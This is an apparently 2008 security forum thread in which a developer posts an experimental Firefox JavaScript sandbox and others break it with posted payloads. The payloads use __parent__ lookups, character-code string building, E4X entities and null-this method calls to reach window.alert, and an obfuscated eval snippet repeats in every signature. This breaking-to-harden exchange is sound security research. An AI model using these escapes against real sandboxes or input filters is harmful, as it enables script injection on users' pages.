I was toying with the idea to allow the execution of simple Javascript without causing XSS in Firefox. I use "new Function" and "tosource" to create the source code and then some constants to override document, alert etc.

[www.businessinfo.co.uk]

Can you get a alert box to popup when clicking run code button?

Update...
I've improved it slightly

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]



Edited 2 time(s). Last edit at 02/21/2008 06:07AM by Gareth Heyes.

A couple of bugs preventing any test:

line 10,

for(i in window)

should be

for(var i in window)

otherwise "i" is included in the properties you replace with "_$1"

Then you're testing only the first and the last of the window properties for (symmetric) word boundaries:

safeSource.replace(eval('/(\b'+props.join('|')+'\b)/g'), "_$1");

shoud be

safeSource.replace(eval('/\b('+props.join('|')+')\b/g'), "_$1");

The combination of these bugs makes "function" become "funct_ion" and any "safeSource" code be not evaluable.

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

@ma1

Fixed thanks!

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

new Function("alert(1)")()

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 02/21/2008 08:41AM by ma1.

I've improved the regexp, thanks for testing, See if you can beat it again :)

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

(function() { var a = "external", b = "Funct()"; new Function(a + b)()})()

BTW, could you remove that "document.getElementById('code').value =" before eval?
It's quite annoying having "undefined" in the box upon successful execution of a void expr. Thanks :)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Nice1 :)

Fixed. I've added another box with the output and removed the annoying document.getElementById line.

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

I've fixed a bug with the constants, it should be working correctly now.

Can anyone beat the sandbox? :D

Update...
Added global variables with references to alert, eval etc. The script should now block access to those properties.

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]



Edited 1 time(s). Last edit at 02/21/2008 10:29AM by Gareth Heyes.

I'm wondering if the first 3 statements of your script really aim to impair usage of any "a", "e" or "w" inside code, or it's just an accident :-k

Also, why dots are replaced with null? In other words, could you formally declare what kind of scripts are allowed to run there?
Like "no dot notation but literal property access" plus "a, e, and w are forbidden everywhere in the beginning of a word"?

However,

function() { var x = "_pa";  return x[x = "_" + x + "rent__"][ x[5] + "xternalFunct"]() }()

BTW, the regular expression has half of the initial bug again, you should put the right word boundary out of the main bracket group.

On a side note, taking a look at [code.google.com] may help your research focus...

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 02/21/2008 11:26AM by ma1.

@ma1

Great find again :)

Yeah I'm aware of Google Caja but I just wanted a simple sandbox function and I had the idea to use Function() and constants in this way. The dot replacement was meant to prevent E4X vectors like 1..eval or 1..__parent__ etc. I'm going to replace the regular expressions with object prototypes and see if that performs any better.

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

considering javascript is object oriented, removal of '.' kind of defeats the purpose.. unless this was for like, basic social networking or weblog type crap, this is pretty annoying. What can actually be executed that ISN'T malicious? I couldn't even get it to do basic math without altering my code. -_-

I'm with fragge on this; what's the point here?

----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]

It's still buggy at the moment and I posted it to be broken so I could understand the methods to protect it. The idea is to allow basic math, functions and for loops etc. Firefox has a sandbox feature for extensions and I wanted one for a normal web page to use in the applications I write.

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

Ok I've removed the naff regular expression and updated the code. See if you can inject now :)

Update...
Oooppps it contains a bug

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]



Edited 1 time(s). Last edit at 02/22/2008 04:31AM by Gareth Heyes.

Updated again...

Seems to work well now, underscores are blocked and this. Every global variable is overwritten with a local one. The Function constructor is redefined to prevent code injection.

Is it still possible to inject?

Valid code:-
1+1
s='xyz'
(function(){return 'test'})();

Invalid code:-
alert(1)
(true).eval
x=escape.prototype.constructor.constructor;x('alert(1)')()

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

Damn!

This works:-
x=1[unescape('%5f%5fparent%5f%5f')]['alert'],x(1)

Any ideas on how to protect against __parent__ and "this"?

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

(function(){ var a = String.fromCharCode(95,95), b = "lert"; a[a+"parent"+a]["a"+b](1); })()

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

@ma1

Nice! Thanks :)

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

Fixed

Added unescape and string to the local variable scope.

Improved it further, can anyone inject now? :)

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]



Edited 1 time(s). Last edit at 02/22/2008 12:58PM by Gareth Heyes.

(function() { var __p = code.substr(18,2); p[p+"parent"+p]["alert"](1)})()

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

@ma1

That doesn't seem to work for me, is it on Firefox 2 or 3?

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

Gareth, works for me both on Fx 2 and on Fx 3 (Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.9b4pre) Gecko/2008021904 Minefield/3.0b4pre)

Edit:
be sure there's no leading space when you paste it in the textbox

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 2 time(s). Last edit at 02/22/2008 03:58PM by ma1.

Weird I get:-
TypeError: p[p + "parent" + p] has no properties

Hmmmmm I'll look into it

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

@ma1

Ah the space before the code doh! Sorry about that.

Thanks again! Great find :)

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

@ma1

You rule! Thanks again, fixed.

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

(function() { var p = <b>&#095;&#095;</b>; return 1[p+"parent"+p]["alert"](1)})()

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Hehe I was playing with E4X too but you beat me to it :)

Nice find again!

Update...
Fixed, added the # to the regular expression because it's unlikely to be needed in the the code.

E4X also supports JS expressions so there may be a way to inject using them. Like this:-
<>{alert(1)}</>

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]



Edited 1 time(s). Last edit at 02/22/2008 04:44PM by Gareth Heyes.

Sorry, but you're going to fail at this unless you build the full AST, do source-to-source translation, and insert runtime checks in a slew of places.

({}).valueOf.call(null).alert('lose');

[].sort.call(null).alert('lose')

({}.constructor.prototype.toString=function(){return "f".constructor.fromCharCode(95,95,112,97,114,101,110,116,95,95);}, y={},y[{}].alert('lose'))

I'm too lazy to come up with anything else at the moment, but this is doomed to failure the current way you're doing it. See also the stuff I wrote up and posted at [stuff.mit.edu] regarding hacking Facebook's sandboxing mechanism for more of this kind of stuff against a far more principled (but not quite at the level of Caja) approach.

@Waldo

Cool stuff man! :) I already read your stuff, yeah maybe your right but it is nevertheless an interesting experiment.

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]

@Waldo

I've fixed those thanks :)

------------------------------------------------------------------------------------------------------------

(
[º,À,Æ,Ç,Å]=<ª><µ>{(![]+[])[+!![]+[]]}</µ>
<µ>{(![]+[])[+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+!![]+!![]+[]]}</µ>
<µ>{(!![]+[])[+!![]+[]]}</µ><µ>{(!![]+[])[+[]]}</µ>
</ª>.*).*(\u0065\u0076\u0061\u006c([]+º+À+Æ+Ç+Å+['('+[+!+[]]+')'])).
@À.º.Æ.Å.Ç
"People who say it cannot be done should not interrupt those who are doing it."

labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [www.businessinfo.co.uk]